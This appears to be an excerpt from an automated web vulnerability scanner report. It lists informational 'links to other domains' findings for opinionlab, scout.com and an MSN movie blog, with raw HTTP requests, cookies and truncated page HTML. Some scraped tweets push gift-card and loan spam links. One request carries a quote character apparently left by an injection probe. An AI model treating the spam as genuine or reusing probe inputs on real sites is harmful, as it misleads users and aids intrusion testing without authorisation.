<span class="source">via <a href="http://cotweet.com/?utm_source=sp1" rel="nofollow">CoTweet</a>
...[SNIP]...
<a href="http://twitter.com/CL_Tickets" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CL_Tickets');"><img alt="Images5_normal" src="http://a3.twimg.com/profile_images/1131885613/images5_normal.jpg" /></a>
...[SNIP]...
</b> <a href="http://tinyurl.com/4g646dv" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764462314725377');" rel="nofollow">http://tinyurl.com/4g646dv</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/carybot" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/carybot');"><img alt="Swarm_big_normal" src="http://a3.twimg.com/profile_images/1117976465/swarm_big_normal.png" /></a>
...[SNIP]...
</b>,299 Shipped <a href="http://ow.ly/1b6eic" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764444631531520');" rel="nofollow">http://ow.ly/1b6eic</a>
...[SNIP]...
<span class="source">via <a href="http://www.hootsuite.com" rel="nofollow">HootSuite</a>
...[SNIP]...
<a href="http://twitter.com/teayudo" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teayudo');"><img alt="Captain-answer-logo_normal" src="http://a2.twimg.com/profile_images/786613451/captain-answer-logo_normal.jpg" /></a>
...[SNIP]...
</b>.125.000 nec llegar a u$s1.000.000 c acaba el tiempo. <a href="http://www.unmilag" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764436700106752');" rel="nofollow">www.unmilag</a>... <a href="http://ht.ly/1b6eiB" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764436700106752');" rel="nofollow">http://ht.ly/1b6eiB</a>
...[SNIP]...
<span class="source">via <a href="http://www.hootsuite.com" rel="nofollow">HootSuite</a>
...[SNIP]...
<a href="http://twitter.com/SueRailing5058" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SueRailing5058');"><img alt="Default_profile_1_normal" src="http://a2.twimg.com/sticky/default_profile_images/default_profile_1_normal.png" /></a>
...[SNIP]...
</b>,000 Home Depot Gift Card! Type in email here <a href="http://bit.ly/gCMMvy?=mtkx" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764428240195585');" rel="nofollow">http://bit.ly/gCMMvy?=mtkx</a>
...[SNIP]...
<a href="http://twitter.com/Daddioslive" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Daddioslive');"><img alt="20081023_6_normal" src="http://a0.twimg.com/profile_images/183381113/20081023_6_normal.JPG" /></a>
...[SNIP]...
<a href="http://twitter.com/TiffaniAper5751" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/TiffaniAper5751');"><img alt="4813023771209438_double_call_normal" src="http://a0.twimg.com/profile_images/1224173446/4813023771209438_double_call_normal.jpg" /></a>
...[SNIP]...
</b>,500 is waiting for you! Get your money now! Immediate approval! <a href="http://bit.ly/fP4Rur?=mtk1" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764344630943744');" rel="nofollow">http://bit.ly/fP4Rur?=mtk1</a>
...[SNIP]...
<a href="http://twitter.com/RoseannAmsden51" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/RoseannAmsden51');"><img alt="12579665881194844_alejandra_c__model_7_normal" src="http://a3.twimg.com/profile_images/1223131947/12579665881194844_alejandra_c__model_7_normal.jpg" /></a>
...[SNIP]...
</b>,000 Victoria&apos;s Secret Gift Card! <a href="http://bit.ly/fNF1PS?=ody2" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764342139518978');" rel="nofollow">http://bit.ly/fNF1PS?=ody2</a>
...[SNIP]...
<a href="http://twitter.com/SundayHeinzman7" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SundayHeinzman7');"><img alt="16228475791itf4_normal" src="http://a1.twimg.com/profile_images/1226718129/16228475791itf4_normal.jpg" /></a>
...[SNIP]...
</b>,000 Home Depot Gift Card! Enter email here <a href="http://bit.ly/gCMMvy?=odaw" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764266482667520');" rel="nofollow">http://bit.ly/gCMMvy?=odaw</a>
...[SNIP]...
<a href="http://twitter.com/CL_Tickets" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/CL_Tickets');"><img alt="Images5_normal" src="http://a3.twimg.com/profile_images/1131885613/images5_normal.jpg" /></a>
...[SNIP]...
</b> <a href="http://tinyurl.com/4lsmk98" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764252301725696');" rel="nofollow">http://tinyurl.com/4lsmk98</a>
...[SNIP]...
<span class="source">via <a href="http://twitterfeed.com" rel="nofollow">twitterfeed</a>
...[SNIP]...
<a href="http://twitter.com/SomethingAwfull" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/SomethingAwfull');"><img alt="Header-logo_normal" src="http://a3.twimg.com/profile_images/415532197/header-logo_normal.png" /></a>
...[SNIP]...
</b>,695 home theater pet seating [Stupid] <a href="http://bit.ly/fVTFZG" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764165953585153');" rel="nofollow">http://bit.ly/fVTFZG</a>
...[SNIP]...
<span class="source">via <a href="http://www.visibli.com" rel="nofollow">Visibli</a>
...[SNIP]...

22.294. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /ccc01/o.asp?ID=WpkpVtTB HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17222
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:40 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS: 1 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...
<br />&bull; For <a href="https://billing.microsoft.com/home.aspx" target="blank">Billing/Account Questions</a>
...[SNIP]...

22.295. https://secure.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.scout.com
Path:   /a.z

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%26pid%3D88%27%26yr%3D2011 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88'&yr=2011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:06 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
<noscript>
       <img src="https://pt200191.unica.com/ntpagetag.gif?js=0&amp;site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="https://sb.scorecardresearch.com/p?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" />
   </noscript>
...[SNIP]...

22.296. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/the-hitlist-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:37 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a739047b5d6e407394ad97b1d13404d1; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=49106A6F091149598AA6F37326FBC37E; domain=.entertainment.msn.com; expires=Thu, 18-Aug-2011 16:57:37 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406657&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg" />What if movie posters just cut to the chase&#63; Damn the <i>
...[SNIP]...
</i> title -- this is what you really want, right&#63; <a href="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0" title="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0">The Shiznit</a>
...[SNIP]...
<br />The <a href="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0" title="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0">Shiznit</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128203805_PROTO-2-popup.jpg" />My goodness. Finally&#33; A genuinely sweet story involving alcohol and one of the Sheen clan.<br />
...[SNIP]...
<br />Here&#39;s the story from the<a href="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;business&#47;23proto.html&#63;_r&#61;1" title="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;business&#47;23proto.html&#63;_r&#61;1"> New York Times</a>
...[SNIP]...
<p>&#34;The year was 2005, and Mr. Estevez was working on <a href="http&#58;&#47;&#47;movies.nytimes.com&#47;movie&#47;334717&#47;Bobby&#47;overview" title="http&#58;&#47;&#47;movies.nytimes.com&#47;movie&#47;334717&#47;Bobby&#47;overview">&#39;Bobby,&#39;</a> a film he wrote and directed, about the assassination of <a href="http&#58;&#47;&#47;topics.nytimes.com&#47;top&#47;reference&#47;timestopics&#47;people&#47;k&#47;robert_francis_kennedy&#47;index.html&#63;inline&#61;nyt-per" title="http&#58;&#47;&#47;topics.nytimes.com&#47;top&#47;reference&#47;timestopics&#47;people&#47;k&#47;robert_francis_kennedy&#47;index.html&#63;inline&#61;nyt-per">Robert F. Kennedy</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128202305_rickygervais_wideweb__430x322.jpg" />Whatever Ricky Gervais haters. When he&#39;s in the right element, he rules. <br />
...[SNIP]...
<br />Watch it <a href="http&#58;&#47;&#47;www.youtube.com&#47;watch&#63;v&#61;tsafwBj4t1s&#38;feature&#61;player_embedded" title="http&#58;&#47;&#47;www.youtube.com&#47;watch&#63;v&#61;tsafwBj4t1s&#38;feature&#61;player_embedded">here</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110127184824_jackson1-300x214.jpg" />&#34;The Hobbit&#34; has had so many setbacks, but this one, the director&#39;s health, is most troublesome. According to reports, he&#39;s in the clear, but we all hope for Peter Jackson&#39;s speedy
...[SNIP]...
<br />Here&#39;s more from <a href="http&#58;&#47;&#47;www.nextmovie.com&#47;blog&#47;peter-jackson-hospitalized&#47;" title="http&#58;&#47;&#47;www.nextmovie.com&#47;blog&#47;peter-jackson-hospitalized&#47;">Next Movie</a>
...[SNIP]...
<p>Yes, unfortunately, it&#8217;s true&#58; according to the New Zealand website <a href="http&#58;&#47;&#47;www.stuff.co.nz&#47;national&#47;4589305&#47;Sir-Peter-Jacksons-stomach-ulcer-scare" title="http&#58;&#47;&#47;www.stuff.co.nz&#47;national&#47;4589305&#47;Sir-Peter-Jacksons-stomach-ulcer-scare">Stuff</a>
...[SNIP]...
<p><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110126191944_deeper&#37;20crop.jpg" />With such wonderfully eclectic, innovative, moving, funny, disturbing and beautifully crafted shorts to choose from, Sundance jury duty was not an easy task.</p>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatleft userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124174321_social_network_pga.jpg" />Will &#34;The King&#39;s Speech&#34; reign at the Oscars&#63; And even, in spite of most Oscar oddsmakers, win Best Picture&#63;<br />
...[SNIP]...
<br />Here&#39;s more from <a href="http&#58;&#47;&#47;www.thewrap.com&#47;awards&#47;column-post&#47;not-so-fast-weve-got-ourselves-oscar-race-24153" title="http&#58;&#47;&#47;www.thewrap.com&#47;awards&#47;column-post&#47;not-so-fast-weve-got-ourselves-oscar-race-24153">TheWrap</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatright userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110124173707_Kevin-Smith.jpg" />Kevin Smith doesn&#39;t need Hollywood. Or, he doesn&#39;t <i>
...[SNIP]...
<br />Here&#39;s <a href="http&#58;&#47;&#47;www.huffingtonpost.com&#47;2011&#47;01&#47;24&#47;kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html" title="http&#58;&#47;&#47;www.huffingtonpost.com&#47;2011&#47;01&#47;24&#47;kevin-smith-rejects-hollywood-buys-red-state-rights_n_812866.html">more</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110121213042_Cedar-Rapids.jpg" />There are&#160;lots of films to go through at this year&#39;s Sundance Film Festival, and many to be excited for, whether you&#39;re here or not. <br />
...[SNIP]...
<br />Check&#160;out all of their picks <a href="http&#58;&#47;&#47;www.thewrap.com&#47;movies&#47;slideshow&#47;sundance-2011-10-films-were-dying-see-slideshow-24046" title="http&#58;&#47;&#47;www.thewrap.com&#47;movies&#47;slideshow&#47;sundance-2011-10-films-were-dying-see-slideshow-24046">here</a>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.sunsetgun.com">Kim Morgan</a>
...[SNIP]...
<li class="first"><a href="http://www.slashfilm.com">/film</a></li><li><a href="http://blog.brightlightsfilm.com/">Bright Lights After Dark</a>
...[SNIP]...
<li><a href="http://chud.com/articles/">Chud</a></li><li><a href="http://www.cinematical.com">Cinematical</a>
...[SNIP]...
<li><a href="http://filmexperience.blogspot.com/">The Film Experience</a>
...[SNIP]...
<li><a href="http://finalgirl.blogspot.com">Final Girl</a></li><li><a href="http://daily.greencine.com">Green Cine</a></li><li><a href="http://www.hitfix.com">HitFix</a></li><li><a href="http://www.riskybusinessblog.com">Hollywood Reporter Risky Business Blog</a>
...[SNIP]...
<li><a href="http://thehousenextdooronline.com">The House Next Door</a>
...[SNIP]...
<li><a href="http://sunsetgun.typepad.com/sunsetgun/">Kim Morgan's Sunset Gun</a>
...[SNIP]...
<li><a href="http://www.moviecitynews.com/">Movie City News</a>
...[SNIP]...
<li><a href="http://www.avclub.com">Onion AV Club</a>
...[SNIP]...
<li><a href="http://theplaylist.blogspot.com">The Playlist</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/scanners/">Scanners</a></li><li><a href="http://selfstyledsiren.blogspot.com">Self Styled Siren</a>
...[SNIP]...
<li><a href="http://sergioleoneifr.blogspot.com">Sergio Leone and Infield Fly Rule</a>
...[SNIP]...
<li><a href="http://www.sheilaomalle.com">The Sheila Variations</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott">Vanity Fair's James Wolcott</a>
...[SNIP]...
<li class="last"><a href="http://www.thewrap.com">The Wrap</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.297. http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.entertainment.redacted
Path:   /movies/blogs/the-hitlist-blog.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1
Host: social.entertainment.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:51 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://search.bing.com/results.aspx?FORM=entertainment">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345051&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Fsocial.entertainment.redacted%2Fmovies%2Fblogs%2Fthe-hitlist-blog.aspx%3Ffeat%3D04db8167-2807-4c60-b794-b60b92d90ea8&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://search.bing.com/results.aspx">Search the web</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128211044_winters-bone.jpg" />What if movie posters just cut to the chase&#63; Damn the <i>
...[SNIP]...
</i> title -- this is what you really want, right&#63; <a href="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0" title="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0">The Shiznit</a>
...[SNIP]...
<br />The <a href="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0" title="http&#58;&#47;&#47;www.theshiznit.co.uk&#47;feature&#47;if-the-best-picture-nominee-posters-told-the-truth.php&#63;sms_ss&#61;facebook&#38;at_xt&#61;4d411feb6c635f02&#37;2C0">Shiznit</a>
...[SNIP]...
<div class="pst_exc more"><img alt="" class="imagefloatcenter userImage lead" src="http&#58;&#47;&#47;media.social.s-redacted&#47;images&#47;blogs&#47;00290065-0000-0000-0000-000000000000_00000065-06d3-0000-0000-000000000000_20110128203805_PROTO-2-popup.jpg" />My goodness. Finally&#33; A genuinely sweet story involving alcohol and one of the Sheen clan.<br />
...[SNIP]...
<br />Here&#39;s the story from the<a href="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;business&#47;23proto.html&#63;_r&#61;1" title="http&#58;&#47;&#47;www.nytimes.com&#47;2011&#47;01&#47;23&#47;business&#47;23proto.html&#63;_r&#61;1"> New York Times</a>
...[SNIP]...
<p>&#34;The year was 2005, and Mr. Estevez was working on <a href="http&#58;&#47;&#47;movies.nytimes.com&#47;movie&#47;334717&#47;Bobby&#47;overview" title="http&#58;&#47;&#47;movies.nytimes.com&#47;movie&#47;334717&#47;Bobby&#47;overview">&#39;Bobby,&#39;</a> a film he wrote and directed, about the assassination of <a href="http&#58;&#47;&#47;topics.nytimes.com&#47;top&#47;reference&#47;timestopics&#47;people&#47;k&#47;robert_francis_kennedy&#47;index.html&#63;inline&#61;nyt-per" title="http&#58;&#47;&#47;topics.nytimes.com&#47;top&#47;reference&#47;timestopics&#47;people&#47;k&#47;robert_francis_kennedy&#47;index.html&#63;inline&#61;nyt-per">Robert F. Kennedy</a>
...[SNIP]...
